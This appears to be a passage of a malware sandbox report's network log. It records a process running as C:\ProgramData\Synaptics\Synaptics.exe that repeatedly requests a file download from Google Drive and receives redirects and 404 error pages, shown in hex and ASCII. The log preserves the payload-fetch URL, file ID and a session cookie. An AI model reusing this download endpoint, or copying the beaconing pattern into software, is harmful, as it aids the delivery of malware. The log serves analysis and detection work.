                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tTTDHQtVr1To0zHywZeH6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:46 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:46 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 6c 4b 4b 37 41 55 6f 5a 65 4c 33 45 65 73 76 55 48 72 48 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="ElKK7AUoZeL3EesvUHrHgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:46 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        129192.168.2.750170142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:46 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VbdATu1s2SeUoiDGvbBJDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        130192.168.2.750171142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:46 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:46 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7aibd1GG2-QVA15KhQXj5amG22_Aa0pWjmIBuxMDtRiHXSjJQsnVy-mWombofuSp6n
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xSC4nDxN4HrGtznMxYs81w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:46 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:46 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 52 39 79 70 39 75 66 55 44 79 6a 56 4a 66 73 67 4d 5a 46 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="sR9yp9ufUDyjVJfsgMZFFg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:46 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        131192.168.2.750172142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:46 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:47 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4sNAfNMWPnZpWJ3uMbUYmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        132192.168.2.750173142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:46 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:47 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5hkd2Ng6rGBPeBe76WDZHUbVbqN1mKgjKbNlTlOLEt_Qza5EDfYxFmz0UggB3Kn0mwO7I-0RM
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:47 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-49_Q46qm5ZCeUKK2mSlQyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:47 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:47 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6f 71 6f 4b 4b 32 38 35 39 6d 56 7a 2d 7a 2d 53 52 47 30 4d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="UoqoKK2859mVz-z-SRG0Mw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:47 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        133192.168.2.750175142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:47 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        134192.168.2.750174142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:47 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        135192.168.2.750177142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:47 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        136192.168.2.750179142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:48 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:48 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9SkyBKXlsUAt7HAXgRYqng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        137192.168.2.750180142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:48 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:48 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:48 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-35aVsTFcB35cSau3nmjAFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
